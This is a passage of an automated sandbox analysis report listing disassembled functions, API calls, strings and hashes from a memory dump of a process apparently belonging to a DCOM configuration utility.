Instruction Fuzzy Hash: 64017C71900308ABEF10ABA08C4AFEFBAB9EB84714F110419FA11762C1CBB55A558AA5

Function 00202D10 Relevance: 16.6, APIs: 11, Instructions: 123COMMON

Download Yara Rule

APIs

Part of subcall function 0020B37C: __EH_prolog3.LIBCMT ref: 0020B383
Part of subcall function 0020B37C: #324.MFC42U(00000083,?,00000004,00202D50,?,85C979FC), ref: 0020B395
Part of subcall function 0020B37C: #540.MFC42U(00000083,?,00000004,00202D50,?,85C979FC), ref: 0020B3A7
Part of subcall function 0020B37C: #861.MFC42U(001F21A0,00000083,?,00000004,00202D50,?,85C979FC), ref: 0020B3B8

#858.MFC42U(?,?,85C979FC), ref: 00202D5E
#2506.MFC42U(?,?,85C979FC), ref: 00202D69
#800.MFC42U(?,?,85C979FC), ref: 00202D7A
#641.MFC42U(?,?,85C979FC), ref: 00202D85
#858.MFC42U(?,?,?,85C979FC), ref: 00202D99
#2910.MFC42U(00000104,?,?,?,85C979FC), ref: 00202DB2
#5568.MFC42U(000000FF,00000104,?,?,?,85C979FC), ref: 00202E4F
#800.MFC42U(000000FF,00000104,?,?,?,85C979FC), ref: 00202E61
#641.MFC42U(000000FF,00000104,?,?,?,85C979FC), ref: 00202E6C

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #641#800#858$#2506#2910#324#540#5568#861H_prolog3
String ID:
API String ID: 1871001060-0
Opcode ID: a15836f6a45b06630145dd71e03c184c332543b63f0dff68e19ae0bb273829db
Instruction ID: e4b2ad940eb999c2921f9fb91c0d4235e38dd8e7fceb85618e98a772f0900a58
Opcode Fuzzy Hash: a15836f6a45b06630145dd71e03c184c332543b63f0dff68e19ae0bb273829db
Instruction Fuzzy Hash: 97510770D60209DBDF14EFE4C996BEEB7B5BB04310F20452AE012A72D2DB346A59CF51

Function 0020CE81 Relevance: 16.6, APIs: 11, Instructions: 82COMMON

Download Yara Rule

APIs

SetSecurityDescriptorGroup.ADVAPI32(00000000,00000000,?,00000000,?,0020CE3A,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0020CE90
GetLastError.KERNEL32(?,0020CE3A,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0020CE9A
free.MSVCRT ref: 0020CEBE
IsValidSid.ADVAPI32(00000000,00000000,?,?,0020CE3A,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0020CED7

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: DescriptorErrorGroupLastSecurityValidfree
String ID:
API String ID: 3125347566-0
Opcode ID: ebe3036fe68d9eae3a587a7a5a9c028758728f20da1f3ceabece20cce715853d
Instruction ID: a95ebdb3439a36a9387bb63fc9c7ddb743187ed7d829c246aeaf78c1293b60f3
Opcode Fuzzy Hash: ebe3036fe68d9eae3a587a7a5a9c028758728f20da1f3ceabece20cce715853d
Instruction Fuzzy Hash: 0D21E2B2124223EBD7103F62EC0C766BBA9FB14711F31C226F919DA5A1DB35D82086E1

Function 0020CF6C Relevance: 16.6, APIs: 11, Instructions: 82COMMON

Download Yara Rule

APIs

SetSecurityDescriptorOwner.ADVAPI32(00000000,00000000,?,00000000,?,0020CE27,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0020CF7B
GetLastError.KERNEL32(?,0020CE27,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0020CF85
free.MSVCRT ref: 0020CFA9
IsValidSid.ADVAPI32(00000000,00000000,?,?,0020CE27,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0020CFC2

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: DescriptorErrorLastOwnerSecurityValidfree
String ID:
API String ID: 2895241793-0
Opcode ID: 308bede1391246bb88e7eca3463c8b96d6d70c4f89006fb3e069165be1f3bc8d
Instruction ID: 5c01285c1d28a3ee19d18c46e5b745a158dc17b5925a8bc4ba2d276ed2aa9ad9
Opcode Fuzzy Hash: 308bede1391246bb88e7eca3463c8b96d6d70c4f89006fb3e069165be1f3bc8d
Instruction Fuzzy Hash: EE210671225313EBD7202FA2EC0C766BB6AFF14351F20C226F90DD61A1DB75D821D6A4

Function 0020693C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 164registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(80000000,Interface,00000000), ref: 002069E0
RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000050), ref: 00206A19
RegQueryValueW.ADVAPI32(00000000,?,?,00000200), ref: 00206A4C
wsprintfW.USER32 ref: 00206A7F
CLSIDFromString.OLE32(00000000,-00000008), ref: 00206B21
RegCloseKey.ADVAPI32(00000000), ref: 00206C0A

Strings

%s <no name>, xrefs: 00206A73
Interface, xrefs: 002069D6
', xrefs: 002069A8

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: CloseEnumFromOpenQueryStringValuewsprintf
String ID: %s <no name>$'$Interface
API String ID: 4261639067-2844714346
Opcode ID: 22a3676e0dfc430036e3c340510539fde12b1fb6949ad8d44385b041b8cd751c
Instruction ID: 4299069c997a304791b9213fb1a22da52a3d8efcf2cd3760a2d1379a89b4f0d4
Opcode Fuzzy Hash: 22a3676e0dfc430036e3c340510539fde12b1fb6949ad8d44385b041b8cd751c
Instruction Fuzzy Hash: C881C4719113299FDB64EF64DD8DBADB7B8BB08304F1041EAE409A7292DB749E94CF40

Function 001FCD80 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 113stringwindowCOMMON

Download Yara Rule

APIs

#6330.MFC42U(00000001), ref: 001FCD9C
SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 001FCE3D
lstrcpyW.KERNEL32(?,Interactive User,?,?,001F21A0,RemoteServerName,00000001), ref: 001FCE53
#3870.MFC42U(?,000000FF,?,?,001F21A0,RemoteServerName,00000001), ref: 001FCE67
lstrlenW.KERNEL32(?,?,000000FF,?,?,001F21A0,RemoteServerName,00000001), ref: 001FCE73

Strings

RemoteServerName, xrefs: 001FCDFC, 001FCE16
Interactive User, xrefs: 001FCE4D
ActivateAtStorage, xrefs: 001FCDBA, 001FCDD4
RunAs, xrefs: 001FCE8A, 001FCEA4

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #3870#6330MessageSendlstrcpylstrlen
String ID: ActivateAtStorage$Interactive User$RemoteServerName$RunAs
API String ID: 952077393-4117267133
Opcode ID: 034bcbb14c163f4664d1908db9e3654b8c5c03e11e59c368c6650d718a967980
Instruction ID: bc4940a79a5b6b31afdbd0ce91396ba9871bf2ccc1caedaeda4e3a53c8ffc81b
Opcode Fuzzy Hash: 034bcbb14c163f4664d1908db9e3654b8c5c03e11e59c368c6650d718a967980
Instruction Fuzzy Hash: 5231C43169070DA6DB11FE648D8BFB77BAA9F45B00F4545A4FF00AF0C3DBB1A9045A91

Function 0020B580 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 80stringwindowCOMMON

Download Yara Rule

APIs

#4704.MFC42U ref: 0020B59A

Part of subcall function 0020D6F5: RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,?,?,0020D6E4,80000000,?,?,?,?,?), ref: 0020D70D
Part of subcall function 0020D6F5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,80000000,0020D6E4,?,?,?,0020D6E4,80000000,?,?,?,?,?), ref: 0020D72C
Part of subcall function 0020D6F5: RegCloseKey.ADVAPI32(?,?,?,?,0020D6E4,80000000,?,?,?,?,?,?,?,?), ref: 0020D738

lstrcmpiW.KERNEL32(?,001F2778,80000002,SOFTWARE\MICROSOFT\OLE,EnableDCOM,?,?), ref: 0020B5DB
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 0020B5FC
lstrcmpiW.KERNEL32(?,001F2778,80000002,SOFTWARE\MICROSOFT\OLE,EnableRemoteConnect,?,00000100), ref: 0020B63D
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 0020B655
#2634.MFC42U(00000000), ref: 0020B664

Strings

EnableRemoteConnect, xrefs: 0020B619
SOFTWARE\MICROSOFT\OLE, xrefs: 0020B5BC, 0020B61E
EnableDCOM, xrefs: 0020B5B7

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: MessageSendlstrcmpi$#2634#4704CloseOpenQueryValue
String ID: EnableDCOM$EnableRemoteConnect$SOFTWARE\MICROSOFT\OLE
API String ID: 3026051211-444212459
Opcode ID: e83dadc53b26b3eef3b4a623e132bddb23362c55a2f11d25094cfadc242c6e30
Instruction ID: f464e54846843188aa6b40482b91e30e912b0d1a86ab7c16e78377c0dfc2e254
Opcode Fuzzy Hash: e83dadc53b26b3eef3b4a623e132bddb23362c55a2f11d25094cfadc242c6e30
Instruction Fuzzy Hash: 2421CF71620319BAD735AB61DC4DFEBBEADEB04750F000165B619E20D3DB719E54CAA0

Function 0020C61E Relevance: 15.1, APIs: 10, Instructions: 96COMMON

Download Yara Rule

APIs

GetAclInformation.ADVAPI32(00000000,0020BA07,0000000C,00000002,00000000,0000000C,?,?,0020BA07), ref: 0020C64E
GetLastError.KERNEL32(?,0020BA07), ref: 0020C658
GetLengthSid.ADVAPI32(00000000,00000001,00000000,0000000C,?,?,0020BA07), ref: 0020C675
malloc.MSVCRT ref: 0020C687
InitializeAcl.ADVAPI32(00000000,00000002,00000002,0020BA07), ref: 0020C6A1
AddAccessAllowedAce.ADVAPI32(00000000,00000002,00000000,00000000), ref: 0020C6B2
GetLastError.KERNEL32 ref: 0020C6BC
free.MSVCRT ref: 0020C6D2

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: ErrorLast$AccessAllowedInformationInitializeLengthfreemalloc
String ID:
API String ID: 86704185-0
Opcode ID: 03593db5b43e4689414a387fbffb3ed195b6b559270d6c5f35dea8415a22ad45
Instruction ID: 782c5809c31461f0f20e2df053e60d8eab9a9bc2a0ed8cd7f200e27f3bdf93ba
Opcode Fuzzy Hash: 03593db5b43e4689414a387fbffb3ed195b6b559270d6c5f35dea8415a22ad45
Instruction Fuzzy Hash: B03126B1610306DBC311AF65EC48BAE77BCEF99320F318219F505D6292DF34C9118BA4

Function 001FEFE0 Relevance: 15.0, APIs: 10, Instructions: 39stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001FEFEA
#540.MFC42U(000000F8), ref: 001FEFF7

Part of subcall function 001FCF40: __EH_prolog3.LIBCMT ref: 001FCF47
Part of subcall function 001FCF40: #324.MFC42U(00000092,?,00000008), ref: 001FCF59
Part of subcall function 001FCF40: #567.MFC42U(00000092,?,00000008), ref: 001FCF73

#3871.MFC42U(?,000000F8), ref: 001FF01F
lstrcpyW.KERNEL32(?,?,?,000000F8), ref: 001FF031
#2506.MFC42U ref: 001FF03D
#6195.MFC42U(?), ref: 001FF050
#6330.MFC42U(00000000), ref: 001FF059
#693.MFC42U(00000000), ref: 001FF061
#641.MFC42U(00000000), ref: 001FF06C
#800.MFC42U(00000000), ref: 001FF077

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #2506#324#3871#540#567#6195#6330#641#693#800H_prolog3H_prolog3_lstrcpy
String ID:
API String ID: 768229929-0
Opcode ID: 95374588d2bf9e1f38751a97b954ef11daf263b399e773cba30341ad07f1fe68
Instruction ID: af4a61d89593873a60cef4d44d6ff09b622f8d7c61a194663f7423916268617b
Opcode Fuzzy Hash: 95374588d2bf9e1f38751a97b954ef11daf263b399e773cba30341ad07f1fe68
Instruction Fuzzy Hash: 2001E9709212199BCF25EBA0C996BECB669AF65300F8004D8E149671C2DFB46FD4CF52

Function 001FF46C Relevance: 15.0, APIs: 10, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

#800.MFC42U(?,001FD805,?,001FD83D), ref: 001FF47D
#800.MFC42U(?,001FD805,?,001FD83D), ref: 001FF488
#800.MFC42U(?,001FD805,?,001FD83D), ref: 001FF493
#800.MFC42U(?,001FD805,?,001FD83D), ref: 001FF49E
#616.MFC42U(?,001FD805,?,001FD83D), ref: 001FF4A9
#656.MFC42U(?,001FD805,?,001FD83D), ref: 001FF4B4
#609.MFC42U(?,001FD805,?,001FD83D), ref: 001FF4BF
#609.MFC42U(?,001FD805,?,001FD83D), ref: 001FF4CA
#804.MFC42U(?,001FD805,?,001FD83D), ref: 001FF4D2

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #800$#609$#616#656#804
String ID:
API String ID: 3383334730-0
Opcode ID: 6d780c7a31dabfd833e11b855916b47ec2b8e5ac4b0fc3b0fa500ad7528565d6
Instruction ID: 3bef9ffcce4ae310a5419843d03a5bc06b67edf2234b5b9b490aaa264fea5115
Opcode Fuzzy Hash: 6d780c7a31dabfd833e11b855916b47ec2b8e5ac4b0fc3b0fa500ad7528565d6
Instruction Fuzzy Hash: 48F0B775061B018BC729FB70D592AEAB7A1AF20340F414D2DA0AB031D3AF703A55CE00

Function 001FC6F3 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001009,00000000,00000000), ref: 001FC722

Part of subcall function 0020D2F7: wsprintfW.USER32 ref: 0020D35B
Part of subcall function 0020D2F7: lstrcatW.KERNEL32(?,001F60AC), ref: 0020D376
Part of subcall function 0020D2F7: lstrcatW.KERNEL32(?,?), ref: 0020D37E

Part of subcall function 0020C0BC: __EH_prolog3_GS.LIBCMT ref: 0020C0C6
Part of subcall function 0020C0BC: #540.MFC42U(00000488,001FC76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 0020C0F1
Part of subcall function 0020C0BC: RegOpenKeyExW.ADVAPI32 ref: 0020C112
Part of subcall function 0020C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0020C13A
Part of subcall function 0020C0BC: RegCloseKey.ADVAPI32(?), ref: 0020C151
Part of subcall function 0020C0BC: #800.MFC42U ref: 0020C15F

SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 001FC78D
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 001FC79D
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 001FC7A9
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 001FC7B8
#2634.MFC42U(00000001,?,?,?,?), ref: 001FC7C8
#2634.MFC42U(00000001,00000001,?,?,?,?), ref: 001FC7D4

Strings

AccessPermission, xrefs: 001FC751

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: MessageSend$#2634lstrcat$#540#800CloseH_prolog3_OpenQueryValuewsprintf
String ID: AccessPermission
API String ID: 1928919276-2751749857
Opcode ID: 125fda1faff7253e4b8c468145365a9d5e834ed20f726dac7dbd0b08d07b7f2d
Instruction ID: ebc232ad5785c5edbb43f8848dd55b349f922f02638f2f9496e41d570d829016
Opcode Fuzzy Hash: 125fda1faff7253e4b8c468145365a9d5e834ed20f726dac7dbd0b08d07b7f2d
Instruction Fuzzy Hash: CA21BDB050071ABFEB24AF60DC8DEEBBBBDEB05344F118164B519A2192DB715D40CFA0

Function 001FD6B6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001FD6BD
#364.MFC42U(0000007A,00000008,001FD2DA,00000004), ref: 001FD6C9

Part of subcall function 001FC4B6: __EH_prolog3.LIBCMT ref: 001FC4BD
Part of subcall function 001FC4B6: #324.MFC42U(00000088,00000000,00000008,001FBFBA,00000004), ref: 001FC4CE
Part of subcall function 001FC4B6: #567.MFC42U(00000088,00000000,00000008,001FBFBA,00000004), ref: 001FC4E5
Part of subcall function 001FC4B6: #567.MFC42U(00000088,00000000,00000008,001FBFBA,00000004), ref: 001FC500
Part of subcall function 001FC4B6: #567.MFC42U(00000088,00000000,00000008,001FBFBA,00000004), ref: 001FC516
Part of subcall function 001FC4B6: #567.MFC42U(00000088,00000000,00000008,001FBFBA,00000004), ref: 001FC52C

Part of subcall function 002009D5: __EH_prolog3.LIBCMT ref: 002009DC
Part of subcall function 002009D5: #324.MFC42U(00000087,00000000,00000008,001FD6F2,0000007A,00000008,001FD2DA,00000004), ref: 002009ED
Part of subcall function 002009D5: #567.MFC42U(00000087,00000000,00000008,001FD6F2,0000007A,00000008,001FD2DA,00000004), ref: 00200A04
Part of subcall function 002009D5: #567.MFC42U(00000087,00000000,00000008,001FD6F2,0000007A,00000008,001FD2DA,00000004), ref: 00200A1F
Part of subcall function 002009D5: #567.MFC42U(00000087,00000000,00000008,001FD6F2,0000007A,00000008,001FD2DA,00000004), ref: 00200A35
Part of subcall function 002009D5: #567.MFC42U(00000087,00000000,00000008,001FD6F2,0000007A,00000008,001FD2DA,00000004), ref: 00200A4B
Part of subcall function 002009D5: #567.MFC42U(00000087,00000000,00000008,001FD6F2,0000007A,00000008,001FD2DA,00000004), ref: 00200A61

Part of subcall function 001FF346: __EH_prolog3.LIBCMT ref: 001FF34D
Part of subcall function 001FF346: #324.MFC42U(0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF35E
Part of subcall function 001FF346: #567.MFC42U(0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF375
Part of subcall function 001FF346: #567.MFC42U(0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF38F
Part of subcall function 001FF346: #567.MFC42U(0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF3AA
Part of subcall function 001FF346: #567.MFC42U(0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF3C0
Part of subcall function 001FF346: #567.MFC42U(0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF3DA
Part of subcall function 001FF346: #540.MFC42U(0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF3EF
Part of subcall function 001FF346: #540.MFC42U(0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF400
Part of subcall function 001FF346: #540.MFC42U(0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF40F
Part of subcall function 001FF346: #540.MFC42U(0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF420
Part of subcall function 001FF346: #861.MFC42U(001F21A0,0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF436
Part of subcall function 001FF346: #861.MFC42U(001F21A0,001F21A0,0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF442
Part of subcall function 001FF346: #861.MFC42U(001F21A0,001F21A0,001F21A0,0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF453
Part of subcall function 001FF346: #861.MFC42U(001F21A0,001F21A0,001F21A0,001F21A0,0000008B,00000000,00000008,001FD701,0000007A,00000008,001FD2DA,00000004), ref: 001FF45F

Part of subcall function 001FC962: __EH_prolog3.LIBCMT ref: 001FC969
Part of subcall function 001FC962: #324.MFC42U(00000085,00000000,00000008,001FC91A,00000004), ref: 001FC97A
Part of subcall function 001FC962: #567.MFC42U(00000085,00000000,00000008,001FC91A,00000004), ref: 001FC991
Part of subcall function 001FC962: #567.MFC42U(00000085,00000000,00000008,001FC91A,00000004), ref: 001FC9AB
Part of subcall function 001FC962: #540.MFC42U(00000085,00000000,00000008,001FC91A,00000004), ref: 001FC9C2
Part of subcall function 001FC962: #540.MFC42U(00000085,00000000,00000008,001FC91A,00000004), ref: 001FC9D1
Part of subcall function 001FC962: #861.MFC42U(001F21A0), ref: 001FC9E8

Part of subcall function 00209485: __EH_prolog3.LIBCMT ref: 0020948C
Part of subcall function 00209485: #326.MFC42U(00000008,001FD71F,0000007A,00000008,001FD2DA,00000004), ref: 00209496
Part of subcall function 00209485: #567.MFC42U(00000008,001FD71F,0000007A,00000008,001FD2DA,00000004), ref: 002094AD

#567.MFC42U(0000007A,00000008,001FD2DA,00000004), ref: 001FD72E
#567.MFC42U(0000007A,00000008,001FD2DA,00000004), ref: 001FD748
#567.MFC42U(0000007A,00000008,001FD2DA,00000004), ref: 001FD763
#567.MFC42U(0000007A,00000008,001FD2DA,00000004), ref: 001FD779
#567.MFC42U(0000007A,00000008,001FD2DA,00000004), ref: 001FD78F

Strings

0 , xrefs: 001FD74D

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #567$#540H_prolog3$#861$#324$#326#364
String ID: 0
API String ID: 797904982-1293440997
Opcode ID: 10d76489181325d00748f6bfd5ed73e67dc33c6c09ef590a46efd62f3eab89c9
Instruction ID: 9de78745c230f1cdf7efcfc7134831a9676fce9bd0f233f1b383ba0cbee83c61
Opcode Fuzzy Hash: 10d76489181325d00748f6bfd5ed73e67dc33c6c09ef590a46efd62f3eab89c9
Instruction Fuzzy Hash: AA216B70A1579ADADB09EFA486013EDFBA0BF15304F50448DD58933282CBB82B25DFD2

Function 002017C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 002017C7
#2859.MFC42U(?,0000000C), ref: 002017CF
#538.MFC42U(QueryInterface(IID_IUnknown) failed on the data object.,?,?,?,?,0000000C), ref: 00201803

Part of subcall function 0020D91D: __EH_prolog3.LIBCMT ref: 0020D924
Part of subcall function 0020D91D: FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,0020B9B7,?,00000000,00000000,00000000), ref: 0020D942
Part of subcall function 0020D91D: #540.MFC42U ref: 0020D94F
Part of subcall function 0020D91D: #2810.MFC42U(?,%s %s,?,00000000,?), ref: 0020D96C
Part of subcall function 0020D91D: #922.MFC42U(?,?,?,?,?,?,?), ref: 0020D97F
Part of subcall function 0020D91D: #858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 0020D98C
Part of subcall function 0020D91D: #800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 0020D997
Part of subcall function 0020D91D: LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 0020D99F
Part of subcall function 0020D91D: #1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 0020D9AA
Part of subcall function 0020D91D: #800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0020DA13

#800.MFC42U(?,00000000,QueryInterface(IID_IUnknown) failed on the data object.,?,?,?,?,0000000C), ref: 00201819
#538.MFC42U(Drag and Drop Data Object,?,?,?,?,0000000C), ref: 00201828
#800.MFC42U(00000000,?,Drag and Drop Data Object,?,?,?,?,0000000C), ref: 0020184D

Strings

Drag and Drop Data Object, xrefs: 00201820
QueryInterface(IID_IUnknown) failed on the data object., xrefs: 002017FB

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #800$#538H_prolog3$#1197#2810#2859#540#858#922FormatFreeLocalMessage
String ID: Drag and Drop Data Object$QueryInterface(IID_IUnknown) failed on the data object.
API String ID: 393685950-3430251513
Opcode ID: 2c2211e406b0770850bf2340fd27a3b235faebf64cb89b0d5c651e1440355df2
Instruction ID: 9ee3d01974236dbcf8335ba574ccebb7d41a432de256b71a86fa542dddc67840
Opcode Fuzzy Hash: 2c2211e406b0770850bf2340fd27a3b235faebf64cb89b0d5c651e1440355df2
Instruction Fuzzy Hash: D6116035960219DBCB04EBE0C855ABEB774FF58320F204268E511672E2CB306E11CF90

Function 002009D5 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 002009DC
#324.MFC42U(00000087,00000000,00000008,001FD6F2,0000007A,00000008,001FD2DA,00000004), ref: 002009ED
#567.MFC42U(00000087,00000000,00000008,001FD6F2,0000007A,00000008,001FD2DA,00000004), ref: 00200A04
